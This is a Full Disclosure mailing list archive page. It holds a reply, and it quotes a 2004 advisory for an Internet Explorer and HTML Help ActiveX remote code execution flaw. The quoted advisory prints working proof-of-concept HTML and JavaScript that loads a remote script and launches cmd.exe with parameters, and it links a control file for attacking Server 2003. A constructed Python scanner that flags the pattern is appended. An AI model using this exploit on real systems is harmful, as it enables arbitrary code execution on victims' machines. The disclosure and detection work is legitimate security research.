Full Disclosure mailing list archives

Re: Windows (XP SP2) Remote code execution with parameters
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Mon, 27 Dec 2004 22:13:50 -0800

On my SP1 system I get a dialog asking if I want to install "hhctrl.ocx".
Other than that, nothing happens: no files dropped, nothing unusual (of
course I closed the dialog for the hhctrl.ocx installer). The file
"ntshared.chm" does exist in C:\windows\help.
I have no "unusual" security settings or 3rd party software blocking
scripts/activex.

hmm?

m.w

----- Original Message ----- 
From: "ShredderSub7 SecExpert" <shreddersub7 () hotmail com>
To: <full-disclosure () lists netsys com>
Sent: Monday, December 27, 2004 4:24 PM
Subject: [Full-disclosure] Windows (XP SP2) Remote code execution with parameters


PoC (called CMDExe): http://www.freewebs.com/shreddersub7/htm.htm
Discussion: http://www.freewebs.com/shreddersub7/expl-discuss.htm

------------------Which systems are vulnerable?--------
Any system running any Microsoft Windows XP edition with Internet Explorer 6
or higher, even with SP2 applied.
Any system running any Microsoft Windows Server 2003 edition with Internet
Explorer 6 or higher.

------------------How does this exploit work?-----------
The problem with Internet Explorer is that it doesn't set any restrictions
on web pages that request opening a Windows Help file, compiled with HTML
Help. Without a restriction, we can (in Internet Explorer) easily command it
to open any local web page stored on a victim's computer, including web pages
that are found in Windows Help files (with extension .CHM). In this PoC
(Proof of Concept, see below for viewing the PoC), the web page
"alt_url_enterprise_specific.htm" (that is found in the Windows Help file
"ntshared.chm") will be opened in the HTML Help program "hh.exe".
Since we have now opened a web page stored in a Windows Help file (.CHM), it
is possible (thanks to the exploit) to execute an HTML Help control (in this
case, an ActiveX control) that only fully works in Help files. So in this
PoC, we chose to launch an ActiveX control for HTML Help. Then, this
ActiveX control will execute any program we want, in this example that's
"cmd.exe".

Thanks to the exploit, it is even possible to add parameters to the executed
program (here: cmd.exe), so that you can easily start malware out of
"cmd.exe". In this PoC, we added the parameter "/c pause" to the execution
code "cmd.exe", and the result is a DOS Prompt with the text "Press any key
to continue. . .".

To make it complete, the 2 needed programs (Internet Explorer and HTML Help)
will be automatically shut down after the execution is finished. In this
PoC, HTML Help and Internet Explorer will be automatically closed after the
execution, without user interaction.

------------------How can you reproduce this PoC?------------------
Create the file "htm.htm" with the following code (please notice that you
may want to modify the full path to the file "htm.txt"):
--------------
&lt;html&gt;<head><title>CMDExe - Windows Exploit - Remote code execution
with parameters - Proof of Concept</title></head><body>
<br>&lt;OBJECT style="display:none" id="locate"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194"&gt;
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"

value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_spec
ific.htm">
</OBJECT>
<OBJECT style="display:none" id="locator" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value='command;javascript:execScript("document.write(\"<script
language=\\\"javascript\\\"

src=\\\"http://www.freewebs.com/shreddersub7/htm.txt\\\"\"+String.fromCharCo
de(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>

&lt;script&gt;locate.HHClick();setTimeout("locator.HHClick()",100);setTimeou
t("window.opener=null;window.close()",10000)&lt;/script&gt;</body>&lt;/html&
gt;
--------------

Then create the file "htm.txt" (please notice that you may have to change
the full path to your specified program, in this case "cmd.exe"):
--------------
document.write("<object id=a
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command
value=shortcut><param name=item1 value=',cmd.exe,/c
pause,'></object><object
id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param
name=command
value=close></object><script>a.Click\(\);b.Click\(\)</script>");
--------------

If you want to attack Windows Server 2003 systems, you also need to upload
the "hhctrl.ocx" file (http://www.freewebs.com/shreddersub7/hhctrl.ocx)

--------------How to avoid this exploit...-------------
Since there are no patches from Microsoft available yet, here are some
(temporary?) solutions: Disable Internet Explorer
or disable Active Scripting (HOW?).
OR use another browser, for example Mozilla Firefox.

More info (like credits, things that are included etc.) about this exploit
can be found at http://www.freewebs.com/shreddersub7/expl-discuss.htm

Contact: ShredderSub7_at_hotmail.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
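
Added example (not part of either post, and not code from the posters): a Python scanner that flags the markup pattern the advisory describes, i.e. an OBJECT instantiating the HTML Help control by the classid shown above, with an Item parameter pointing at an ms-its: or javascript: target or with the "shortcut" command. The function names, reason strings and the sample page are constructed for illustration; the sample uses placeholder paths.

```python
from html.parser import HTMLParser

# classid of the HTML Help ActiveX control, as it appears in the post
HHCTRL_CLSID = "clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
RISKY_SCHEMES = ("ms-its:", "javascript:")

class HHCtrlScanner(HTMLParser):
    """Collect the <param> name/value pairs of every hhctrl <object>."""
    def __init__(self):
        super().__init__()
        self.objects = []     # one dict of params per hhctrl object
        self._current = None  # params of the object being parsed, if hhctrl

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            is_hh = a.get("classid", "").strip().lower() == HHCTRL_CLSID
            self._current = {} if is_hh else None
            if is_hh:
                self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current[a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None

def findings(html):
    """Return one list of reasons per hhctrl object found in the page."""
    scanner = HHCtrlScanner()
    scanner.feed(html)
    scanner.close()
    report = []
    for params in scanner.objects:
        reasons = []
        if params.get("command", "").strip().lower().startswith("shortcut"):
            reasons.append("shortcut command")
        for name, value in params.items():
            v = value.strip().lower()
            if name.startswith("item") and v.startswith("command;"):
                target = v.split(";", 1)[1].lstrip()
                reasons += [f"{name} targets {s}" for s in RISKY_SCHEMES
                            if target.startswith(s)]
        report.append(reasons or ["hhctrl object instantiated"])
    return report

# Constructed sample page (placeholder paths, not the PoC from the post)
SAMPLE = """<html><body>
<object classid="CLSID:ADB880A6-D8FF-11CF-9377-00AA003B7A11">
<param name="Item1" value="command;ms-its:c:/example/placeholder.chm::/topic.htm"></object>
<object classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<param name="Item1" value="command;javascript:void(0)"></object>
<object classid="clsid:00000000-0000-0000-0000-000000000000">
<param name="Item1" value="command;ms-its:ignored.chm"></object>
<object classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<param name=command value=shortcut><param name=item1 value=",placeholder.exe,"></object>
</body></html>"""
```

Objects written by inline script are not seen by this scan, because the parser treats the contents of a script element as opaque text; fetched script files need to be scanned as well.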

